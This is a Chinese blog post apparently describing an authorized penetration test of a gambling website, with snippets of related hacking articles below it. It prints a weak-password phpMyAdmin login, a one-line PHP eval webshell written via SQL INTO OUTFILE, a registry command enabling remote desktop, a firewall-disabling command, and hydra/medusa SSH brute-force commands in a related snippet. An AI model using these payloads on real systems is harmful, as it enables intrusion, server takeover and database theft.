一次弱口令渗透BC站

最新推荐文章于 2024-05-25 13:58:57 发布
最新推荐文章于 2024-05-25 13:58:57 发布
阅读量2.8k 收藏 17
点赞数 4
分类专栏: 漏洞分析 安全 漏洞挖掘 文章标签: 安全漏洞 安全 数据安全 云安全
qax
本文链接:https://blog.csdn.net/weixin_44578334/article/details/106559633
版权
安全 同时被 3 个专栏收录
34 篇文章 7 订阅
订阅专栏
漏洞分析
28 篇文章 3 订阅
订阅专栏
漏洞挖掘
16 篇文章 23 订阅
订阅专栏

因为某种原因,接手了一个授权的bc站。
内心是拒绝的,但是没办法,硬着头皮收下了。
其实都知道,bc站不是很好弄,在大佬眼里,可能就是掏出一个0day就进去了
但像我这种dd,只敢远观。
打开主页,还算清新的画风,比那些打开就这闪那闪花里胡哨的站舒服多了。在这里插入图片描述

简单的扫了一下目录,扫出了两个比较有用的的东西就是一个后台,一个探针
见到后台,废话不多说,直接弱口令套餐来一份

得到的结果肯定是 密码错误X1 密码错误X2 密码错误X3…………
在这里插入图片描述
算了,不浪费时间了,看一下探针~ 根据探针,得知网站的根目录。底下有phpmyadmin的连接测试
在这里插入图片描述

直接弱口令再来一套,root root 密码错误
Root 123456 密码错 唉 不对 好像是连接成功了
在这里插入图片描述
激动的留下了眼泪
根据探针,得知phpmyadmin的后台地址
在这里插入图片描述
Root 123456
登录

在这里插入图片描述

Phpmyadmin进来了,网站根目录也知道了,那还唠啥了,直接拿shell了
直接执行sql语句
select’<?php @eval($_POST[pass]);?>’ into outfile ‘D:/xxx/xxx/xxx.php’

一句话连接上,在这里插入图片描述
Whoami system ………… 这还玩啥了,提权都不用了
在这里插入图片描述
通过查看服务器文件,得知后台登陆密码,登陆后台
在这里插入图片描述

因为个人喜好,比较喜欢用cs,powshell上线
读了一下密码,直接远程连接

在这里插入图片描述
但是
在这里插入图片描述
netstat -an ,没开3389
在这里插入图片描述

开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

但是连接了一下,还是不行,用nmap扫描了一下端口,只有80端口开放

应该是开着防火墙netsh firewall set opmode mode=disable 关闭防火墙
在这里插入图片描述

再连接3389 连接成功

在这里插入图片描述

根据浏览器历史记录,又发现另一个网站
在这里插入图片描述

其实没啥了,直接数据库打包~完活上交。

QAXteam
关注
  • 4
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
专栏目录
网络安全渗透思路(带视频讲解)
03-20
详细讲解网络安全,对一个网站一个服务器的漏洞分析思路,像黑帽子一样去漏洞分析。
java弱口令验证的代码
07-19
包含连续或多个重复字符(如abc,123,111,bbb)、键盘连续字符(如qwe,!@#,qaz)、关键字的验证(如admin,root,user),不用引jar文件,导入项目直接可用
对某bc一次渗透测试
zhangge3663的博客
10-27 4813
很多人问我你日是用手工还是工具扫?我觉得两者同时进行效率会高些,所谓双管齐下,无不破,当然还得看人品。 前段时间经常日有颜色的,懂得都懂,emmm哈哈哈,但都是套路,跟bc又密不可分。 于是就按着套路顺利打开下面这个: 刚好正是中午的时候,准备恰饭去,先将这个丢到某W某S里面,如果有东西就直接捡现成的,于是: (ps:不得不承认我长得帅!) 懂的都懂 猜测估计是xp_cmdshell禁用或者删除 当前权限又是dba,而且支持堆叠可以执行update ,inser.
一兄弟被坑,我渗透进某BC的杀猪盘经历
最新发布
jennycisp的博客
05-25 939
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。拿到目标网站,可见是一个很常规的bc,而且做的有点low逼。
bc渗透,到社工20w会员的源码
ss810540895的博客
04-01 743
年月日完全没有找到,打算登录邮箱看看有没有,找了一个泉州的ip,代理成功登录上QQ,完全可以说明这个人就在泉州,翻了一大圈都没有啥收货,只得到了一个没用的服务器和一个免签平台,我这里打算登录他的godady,不出意外服务器和域名都在这里,godady的用户名都拼接了好久,结果拼接对了登不上,重置了他的密码,但是有两步验证,还需要手机验证码,放弃这一步了。由于昨天本来想钓鱼的,在这个网站前端添加了一个flsh的钓鱼窗口,但是这个人不傻,没有下载,反而还上了安全狗,但就这个安全狗就成了这次社工的突破点。
渗透bc网站教学_重视思想方法的渗透与专题复习 有效落实核心素养的培养
weixin_39607865的博客
11-21 501
重视思想方法的渗透与专题复习 有效落实核心素养的培养——以八上期末《数形结合》专题课为例摘要:数学教学不仅使学生掌握现代生活、学习中必需的数学知识和技能,还应培养学生数学学科核心素养,为其适应终身学习奠定基础。连接“近处”的数学知识技能与“远方”的核心素养的关键在于数学思想方法的培养,一线教师需注重日常教学中数学思想方法的不断渗透与阶段性的专题复习。关键词:核心素养;数学知识;思想方法一...
BC渗透的常见切入点(总结)
zhangge3663的博客
01-05 4572
做了不少qp,BC渗透了,通宵了2个晚上干了几个盘子,简略的说下过程,做一下总结。 首先说一下qp, 以我的渗透成功案例来说的话首先信息收集必不可少的,qp的特点是什么呢? 他的后台会在服务器域名的后面以不同的端口形式架设 如图: 关于端口可以发现,基础东西你们都懂。 切入点: 在app里面抓包,查找邮箱,充值的地方寻找sql注入或者意见反馈的位置XSS 有一种情况是抓包显示127.0.0.1的抓不到包的情况,这种情况多于大盘子,它不一定走的是TCP UDP协议。可以参考T-ice表哥说的 P..
超级弱口令检查工具(附带弱口令字典)
07-22
超级弱口令检查工具(附带弱口令字典)
原创一次性口令(OneTimePassword)C语言源码
11-09
技术是一种接近自然随机数算法:均态分布随机数算法(非正态分布/高斯分布随机数算法)。 可能是超简单、超快速、超高效的口令生成器。 欢迎各路加解密精英高手破解,如果您破解了,拜请通知我。
常见弱口令字典.rar
01-27
通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令弱口令指的是仅包含简单数字和字母的口令
1000w常见弱口令字典.zip
08-07
包含1000W常用弱口令密码(数字类、拼音类、生日类等等), 仅供安全参考,请知悉
渗透bc网站教学_【育人智慧】李秋明:数学文化在教学育人中的渗透
weixin_39545329的博客
11-21 436
编者按《静待花开——百名特级谈育人智慧》(上、下)由上海市特级教师特级校长联谊会与上海教育杂志社主编,在上海教育丛书编委会的大力支持下,于2020年8月由上海教育出版社出版。该书是继《师道匠心》、《修炼》后,又一部凝结着特级教师特级校长们教育心得的集体力作。从“育人”的维度倾情讲述的一个个故事,正是他们对育人的思考、践行与提炼。智慧育人,润物无声。静待花开,师生共同慢慢成长。本公众号撷...
一次BC网站渗透测试实战
qq_35664104的博客
03-08 2401
一次bc棋牌网的渗透实战
【网安实战】兄弟被坑,我渗透进某BC的杀猪盘经历
Y525698136的博客
06-10 455
这位兄弟找到我,告诉我被骗了很多钱,我们这些正义的白帽子当然能帮则帮啦.
渗透bc网站教学_初一数学思想方法渗透技巧的研究 编号:2020009
weixin_39914863的博客
11-21 451
初一渗透数学思想技巧的策略研究-------心得体会陵城区实验中学 季淑红自从在2020年3月申报了区级小课题后,我就积极准备材料,扎实开展研究。现我把上半年研究的心得体会与大家分享,我研究的课题是“初一渗透数学思想技巧的策略研究”。七年级下册数学各章节中,渗透的数学思想有:数形结合、分类讨论、方程、转化、和整体的数学思想方法等。我在备课、上课、练习、典型例题讲解和复习课中渗透了这些数...
渗透bc网站教学_课堂案例|线上线下几何教学的思考 :以等边三角形教学为例...
weixin_39895995的博客
11-21 311
这是 点通数学 的第 109篇推送点击上方蓝字关注我们吧在“停课不停学、停课不停教”的号召下,面对无学生参与的网络教学对于特殊时期的在线教学对所有老师来说都是一次新的挑战。如何把握线上线下教学的区别?教什么、怎么教、和线下的教学又有怎样的变化?这些问题都直接考验教师的眼界、智慧和情怀。线上的教学与学生隔着屏幕,不能实时看到学生的反应,跟线下的教学相比有着不小的冲击。本文以《14.7等边...
SSH弱口令渗透测试
明裕学长的博客
05-23 1242
任务环境说明: 服务器场景:Linux 服务器场景操作系统:Linux(版本不详) 渗透机环境说明: BT5渗透机用户名:root密码:toor Kali渗透机用户名:root密码:toor Windows7渗透机用户名:administrator密码:123456 靶机场景 19-JY-Linux--1 172.16.102.250 1.在BT5中使用Zenmap工具扫描服务器场景Linux所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、23端口。并将该
网站漏洞排查经验
weixin_34202952的博客
06-05 242
  在这里分享一些之前对某网站会员/用户系统(一般域名都是passport.xx.com)进行漏洞检查查出的一些问题,这些问题大多都是逻辑类漏洞,利用漏洞进行攻击并不需要什么高深的技术能力,所以危害尤其大,把相关经验分享给大家希望大家可以自查。 这里要说明,下面很多漏洞的例子是基于已经获得有效的账号密码(行话说就是密正的账号)的前提的,大家可能会问: 1、怎么可能拿到别人的账号和密码?其实有...
一次针对BC杀猪盘渗透一条龙
渗透测试研究中心
01-05 475
0X00 歪打正着无意间碰到一套垃圾菠菜网站杀猪盘挨个访问能扫描出来的目录与文件发现并没有太大作用,不过发现了后台地址。phpmyadmin访问500。访问xd.php到后台访问发现还需要授权验证码试了下8888,123456之类的都提示错误,当场关闭。尝试子域名爆破也只有一个。Nmap扫描也没有什么发现。返回首页发现url有点不常见。0X01 寻找同类型网站以及源码这种搞诈骗...
ssh弱口令渗透测试
10-08
ssh弱口令渗透测试是通过尝试常见的弱口令(如"admin/admin"、"root/root"等)来获取未授权访问目标主机的权限。为了进行ssh弱口令渗透测试,您可以使用一些工具,例如Hydra、Medusa和Metasploit等。这些工具可以自动化地进行大规模的密码破解攻击,以识别弱口令。 使用Hydra进行ssh弱口令渗透测试的命令示例: ``` hydra -l <用户名> -P <密码字典文件> ssh://<目标IP地址> ``` 使用Medusa进行ssh弱口令渗透测试的命令示例: ``` medusa -u <用户名> -P <密码字典文件> -h <目标IP地址> -M ssh ``` 另外,Metasploit也提供了ssh弱口令渗透测试的模块,您可以使用它来进行测试。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

QAXteam

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值